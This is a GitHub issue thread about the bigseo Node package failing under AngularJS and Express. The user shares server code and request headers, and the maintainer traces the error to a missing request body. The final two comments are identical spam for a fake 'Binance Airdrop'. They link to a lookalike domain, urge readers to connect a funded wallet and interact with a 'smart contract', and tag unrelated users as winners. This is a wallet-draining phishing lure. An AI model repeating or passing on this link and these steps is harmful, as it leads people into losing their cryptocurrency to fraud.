### ISSUE TITLE
Throwing error with angular

### ISSUE THREAD

**Issue by ZuSe** [grillorafael/bigseo#3]
I tried to integrate bigseo with my AngularJS project.

It fails when calling /valid/cache with

> TypeError: Cannot read property 'url' of undefined
>    at BigSEO.valid (/myproject/node_modules/bigseo/index.js:157:23)
>    at Layer.handle [as handle_request](/myproject/node_modules/express/lib/router/layer.js:95:5)
>    at next (/myproject/node_modules/express/lib/router/route.js:131:13)
>    at Route.dispatch (/myproject/node_modules/express/lib/router/route.js:112:3)
>    at Layer.handle [as handle_request](/myproject/node_modules/express/lib/router/layer.js:95:5)
>    at /myproject/node_modules/express/lib/router/index.js:277:22
>    at Function.process_params (/myproject/node_modules/express/lib/router/index.js:330:12)
>    at next (/myproject/node_modules/express/lib/router/index.js:271:10)
>    at BigSEO.middleware (/myproject/node_modules/bigseo/index.js:114:9)
>    at Layer.handle [as handle_request](/myproject/node_modules/express/lib/router/layer.js:95:5)

I call bigseo.save() inside my controller this way:

```
 $document.ready(function () {
        bigseo.save();
    });
```

Opera shows me the request payload as:
`{"url":"https://localhost:8047/home"}`

I would appreciate any advice. Thanks in advance!

**Comment by grillorafael** [comment]
Hi! which version of angular/express are you using it?

**Comment by ZuSe** [comment]
Hi grillo,

I am using angular 1.5.0 and bigseo 0.6.4, so both latest stable.
Are there special parameters required in the express.js configuration (I am running 4.13.3)?

**Comment by grillorafael** [comment]
Hi @ZuSe 
Can you paste here the code you used on your expressjs and on your angular?

Thanks

**Comment by ZuSe** [comment]
Hi @grillorafael 
this is my express.js file (used to start the server)

> var express = require('express');
> var http = require('http');
> var https = require('https');
> var fs = require('fs');
> var bigSeo = require('bigseo')();
> var app = express();
> 
> var host = process.env.VCAP_APP_HOST || 'localhost';
> var port = process.env.VCAP_APP_PORT || 8081;
> 
> // Default values
> opts = {
>     log: true,
>     cache_path: 'caches',
>     cache_url: '/save/cache',
>     valid_url: '/valid/cache',
>     valid_for: 24 // hours
> };
> 
> // Your application config
> app.use(bigSeo.run(opts));
> // Your application routes
> app.use('/libs', express.static(__dirname + '/libs'));
> app.use('/node_modules', express.static(__dirname + '/node_modules'));
> app.use('/assets', express.static(__dirname + '/assets'));
> app.use('/src/app', express.static(__dirname + '/src/app'));
> app.use('/dist', express.static(__dirname + '/dist'));
> 
> app.use(function(req, res, next) {
>     res.header("Access-Control-Allow-Origin", "*");
>     res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept");
>     next();
> });
> 
> app.all('/*', function(req, res, next) {
>     // Just send the index.html for other files to support HTML5Mode
>     res.sendFile('index.html', { root: __dirname });
> });
> 
> var options = {
>     key: fs.readFileSync('./ssl/key.pem'),
>     cert: fs.readFileSync('./ssl/cert.pem')
> };
> 
> http.createServer(app).listen(port);
> https.createServer(options, app).listen(8047);
> console.log('Server running at http://' + host + ':' + port + '/');

In my first post is the code how I call bigseo in my angular-controller.

I am using angular-ui router, might this be a problem?

**Comment by grillorafael** [comment]
it seems ok. Can you check on the developer tool which requests `bigseo.save()` is triggering and with which parameters?

**Comment by ZuSe** [comment]
The payload is in the first request.

bigseo.save() is called in my startpage controller.

the request that opens /home

> Request URL:https://localhost:8047/home
> Request Method:GET
> Status Code:200 OK
> Remote Address:[::1]:8047
> Response Headers
> view source
> Accept-Ranges:bytes
> Access-Control-Allow-Headers:Origin, X-Requested-With, Content-Type, Accept
> Access-Control-Allow-Origin:*
> Cache-Control:public, max-age=0
> Connection:keep-alive
> Content-Length:22146
> Content-Type:text/html; charset=UTF-8
> Date:Sun, 13 Mar 2016 20:50:26 GMT
> ETag:W/"5682-15371bba17a"
> Last-Modified:Sun, 13 Mar 2016 20:47:15 GMT
> X-Powered-By:Express
> Request Headers
> view source
> Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8
> Accept-Encoding:gzip, deflate, lzma, sdch
> Accept-Language:en-US,en;q=0.8
> Cache-Control:max-age=0
> Connection:keep-alive
> Cookie:_pk_id.1.1fff=dbe3d30b46828901.1452941735.1.1452941735.1452941735.; _pk_ses..1fff=*
> Host:localhost:8047
> Upgrade-Insecure-Requests:1
> User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 OPR/35.0.2066.92

The request logged in bigseo.index.js (157):
http://paste.ubuntu.com/15378415/

as you can see request has no body attribute, but it is expected to have one

```
BigSEO.prototype.valid = function(req, res) {
    console.log('BigSEO Validation Request',req);
    var url = req.body.url;
    url = _this.processUrl(url);
    _this.validCacheFor(url, function(valid) {
        res.json({
            valid: valid
        });
    });
};
```

**Comment by grillorafael** [comment]
Yes @ZuSe that seems to be the issue. I didn't try bigSeo on the latest version of angular/express. I'll try to replicate this issue and then I return to you

**Comment by ZuSe** [comment]
Were you able to replicate it?

**Comment by steveg-gpsaustrack** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @aoruize, @MatteoGauthier, @satroan, @arielh1004, @alcattell, @alexcode-lab, @jokerkeny

**Comment by steveg-gpsaustrack** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @xyrobo, @perara, @lofnrei, @midtur, @nealgentry, @atulya2109, @yechankun
